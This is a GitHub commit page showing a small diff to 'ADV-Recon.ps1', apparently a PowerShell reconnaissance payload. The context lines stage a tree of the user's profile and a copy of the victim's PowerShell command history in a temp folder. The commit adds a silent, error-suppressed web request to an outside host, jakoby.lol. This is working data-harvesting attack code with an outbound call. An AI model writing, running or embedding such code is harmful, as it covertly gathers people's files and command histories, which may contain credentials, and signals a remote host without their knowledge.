Update ADV-Recon.ps1

This commit is contained in:
I-Am-Jakoby 2023-06-10 15:20:47 -05:00 committed by GitHub
parent fb105807b0
commit 38509bd7d8
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -57,7 +57,7 @@ tree $Env:userprofile /a /f >> $env:TEMP\$FolderName\tree.txt
# Powershell history # Powershell history
Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination $env:TEMP\$FolderName\Powershell-History.txt
iwr "https://jakoby.lol/hak5" -EA 0 >$null
############################################################################################################################################################ ############################################################################################################################################################
function Get-fullName { function Get-fullName {